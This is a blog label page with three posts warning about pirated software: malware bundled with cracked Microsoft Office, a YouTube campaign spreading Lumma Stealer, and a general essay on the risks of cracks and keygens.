Search This Blog

Powered by Blogger.

Blog Archive

Labels

Showing posts with label Cracked Software. Show all posts

Pirated Microsoft Office Distributes a Malware Cocktail to Infiltrates Systems

 

The hackers are distributing a malware cocktail via cracked versions of Microsoft Office marketed on torrent websites. Malware distributed to customers includes remote access trojans (RATs), cryptocurrency miners, malware downloaders, proxy tools, and anti-AV programs. 

The AhnLab Security Intelligence Centre (ASEC) has recognised the ongoing attempt and warns against the risks of downloading unauthorised software. Korean researchers identified that the attackers employ a variety of lures, including Microsoft Office, Windows, and the Hangul Word Processor, which is popular in Korea. 

MS Office to malware 

The cracked Microsoft Office installer has a well-designed UI that allows users to choose the version they wish to install, the language, and whether to use 32- or 64-bit versions. 

However, in the background, the installer launches an obfuscated.NET malware that contacts a Telegram or Mastodon channel to obtain a valid download URL from which it will download other components. The URL refers to Google Drive or GitHub, both of which are reliable websites that are unlikely to trigger AV warnings. 

The malware component 'Updater' registers tasks in the Windows Task Scheduler to make sure they persist between system reboots. According to ASEC, the malware installs the following forms of malware on the compromised system: 

Orcus RAT: Provides extensive remote control, such as keylogging, webcam access, screen capture, and system modification for data exfiltration. 

XMRig: It is a cryptocurrency miner that exploits system resources to mine Monero. It halts mining during periods of high resource demand, such as while the victim is gaming, to avoid detection. 

3Proxy: Turns infected systems into proxy servers by opening port 3306 and inserting it into normal processes, allowing attackers to redirect malicious traffic. 

Even if the user detects and wipes any of the aforementioned malware, the 'Updater' module, which runs at system launch, will reintroduce it. Users should exercise caution when installing files downloaded from suspicious sources, and they should avoid using pirated/cracked software. 

Similar advertisements have been used to promote the STOP ransomware, which is the most active ransomware operation targeting consumers. Because these files are not digitally signed and users are willing to disregard antivirus warnings when launching them, they are frequently used to infect systems with malware, in this case a whole set.

Beware of Malicious YouTube Channels Propagating Lumma Stealer

 

Attackers have been propagating a Lumma Stealer variant via YouTube channels that post videos about cracking into popular applications. They prevent detection by Web filters by spreading the malware over open source platforms like MediaFire and GitHub rather than proprietary malicious servers. 

The effort, according to FortiGuard researchers, is reminiscent of an attack that was uncovered in March of last year and employed artificial intelligence (AI) to disseminate step-by-step installation manuals for programmes like Photoshop, Autodesk 3ds Max, AutoCAD, and others without a licence. 

"These YouTube videos typically feature content related to cracked applications, presenting users with similar installation guides and incorporating malicious URLs often shortened using services like TinyURL and Cuttly," Cara Lin, Fortinet senior analyst, wrote in a blog post. 

Modus operandi 

The attack begins with a hacker infiltrating a YouTube account and publishing videos pretending to offer cracked software tips, along with video descriptions carrying malicious URLs. The descriptions also lure users to download a.ZIP file containing malicious content. 

The videos identified by Fortinet were uploaded earlier this year; however, the files on the file-sharing site are regularly updated, and the number of downloads continues to rise, suggesting that the campaign is reaching victims. "This indicates that the ZIP file is always new and that this method effectively spreads malware," Lin stated in a blog post. 

The .ZIP file contains an.LNK file that instructs PowerShell to download a.NET execution file from John1323456's GitHub project "New". The other two repositories, "LNK" and "LNK-Ex," both contain .NET loaders and use Lumma as the final payload.

"The crafted installation .ZIP file serves as an effective bait to deliver the payload, exploiting the user's intention to install the application and prompting them to click the installation file without hesitation," Lin wrote.

The .NET loader is disguised with SmartAssembly, a valid obfuscation technique. The loader then acquires the system's environment value and, after the number of data is correct, loads the PowerShell script. Otherwise, the procedure will depart the programme.

YouTube malware evasion and caution

The malware is designed to prevent detection. The ProcessStartInfo object starts the PowerShell process, which eventually calls a DLL file for the following stage of the attack, which analyses the environment using various methods to avoid detection. The technique entails looking for debuggers, security appliances or sandboxes, virtual machines, and other services or files that could impede a malicious process. 

"After completing all environment checks, the program decrypts the resource data and invokes the 'SuspendThread; function," Lin added. "This function is employed to transition the thread into a 'suspended' state, a crucial step in the process of payload injection.” 

Once launched, Lumma communicates with the command-and-control server (C2) and establishes a connection to transfer compressed stolen data back to the attackers. Lin observed that the variation employed in the campaign is version 4.0, but its exfiltration has been upgraded to use HTTPS to better elude detection. 

On the other hand, infection is trackable. In the publication, Fortinet provided users with a list of indications of compromise (IoCs) and cautionary advice regarding "unclear application sources." According to Fortinet, users should make sure that any applications they download from YouTube or any other platform are from reliable and safe sources.

Think Twice Before Using Pirated Software

 

Everyone has at some point in their lives dabbled in the realm of pirated software. Getting free software appeals to a wide range of users, most of whom are unaware of the risks involved. Many customers choose to install unauthorised or pirated copies of software as its price rises. We'll go over the dangers using unauthorised copies might cause. 

Your computer becoming infected is the first threat you encounter. It's conceivable that the crack is malware that has been poorly disseminated. It's possible that some of you think this is just a false positive from an antivirus programme. That, however, is not completely accurate. Malware's negative effects are well known to everyone: it slows down your computer, sends out your personal information, invites friends in, corrupts your data, and so forth. This includes passwords, address books, and information about credit cards and bank accounts that might all be immediately utilised by identity thieves. 

In this article, we will explain why downloading such illegitimate software is risky. 

What Exactly Is Software Piracy? 

Software that has been illegally copied, disseminated, and used is referred to as pirated software. A person who makes several copies of a programme and sells them is the basic example of software piracy, which can include a range of actions. Software piracy is frequently criminalised under copyright infringement laws on the grounds that it violates the copyrights of the developer. 

Software cracking methods

Crackers employ a variety of techniques to circumvent licence keys and software security protections.

Keygen cracking 

Keygen cracking is the process of creating legitimate software licensing keys using a key generating application. This kind of software, also referred to as a "keygen," examines the technique used by the underlying application to produce genuine licence keys for customers who buy software licences. Keygens are used by crackers to get around software activation restrictions and gain access to premium services that are only available to customers who pay. In order for the software to be utilised on numerous computers, the keygen tool is typically supplied along with the cracked version of the software. 

Cracking a patch 

By using this technique, crackers examine the software's source code and produce a programme (referred to as a "patch") that alters it. First, crackers analyze the software's source code to locate the algorithms in charge of enforcing its security measures. The code is then modified by the cracker, who entirely removes these safety precautions. The patch, a brief programme that makes the modifications when applied to the software, is created by crackers after modification. This patch is provided with the cracked software, making it possible to use it with numerous copies of the same programme without having to pay for the licence. 

Server-based cracking 

In server-based cracking, the software's security features are bypassed by setting up a collection of servers. The cracked software is made downloadable from these servers. The servers are set up to go around the security precautions put in place by the software creators. Crackers accomplish this by either directly altering the software's code or by enhancing an already cracked version of the software. They do this by using a key generator to create licence keys for the software. Once this is done, the crackers typically offer a download link so users may access the cracked software on a website. 

Why Should You Stop Using Pirated Software? 

You become more open to assault because of it. Research shows that 34% of unlicensed software downloaded through P2P was malware-infected, which infects a machine after it is downloaded. Of the group, Trojans made up almost half. Malware is made available to you when you install illegal software. Your computer and the data it stores could be destroyed by ransomware, viruses, Trojan horses, and other malicious software. Malicious virus that can access your data is present in some pirated software items. Your gadget and webcam can be controlled using this. Utilising illegally obtained software puts you at risk for a denial of service attack.

The following are some of the risks you may encounter: 

Incompatibility: You might find that the pirated software isn't compatible with your device, meaning it won't function when you need it most. This is true since the software are pirated versions of the originals. The accuracy of your results may change if these software tools work as intended. Because some businesses check the registration of their software, it's possible that the application will function for a time before failing. 

Legal concerns: Everything that has an original will almost definitely be faked. When someone borrows your concept, claims ownership, and then markets it, it is unfair. Businesses should naturally wish to protect their assets. Because they don't adhere to the guidelines, purchasing counterfeit software is not a good idea. The copyright has been violated. 

A product upgrade is not feasible: As new patches or updates are released, you can enhance your programme experience by updating it. This cannot be played on the piracy version. So regardless of the limitations, you're stuck with it. Upgrade attempts to original packages may result in punishment. There is no way to upgrade the product.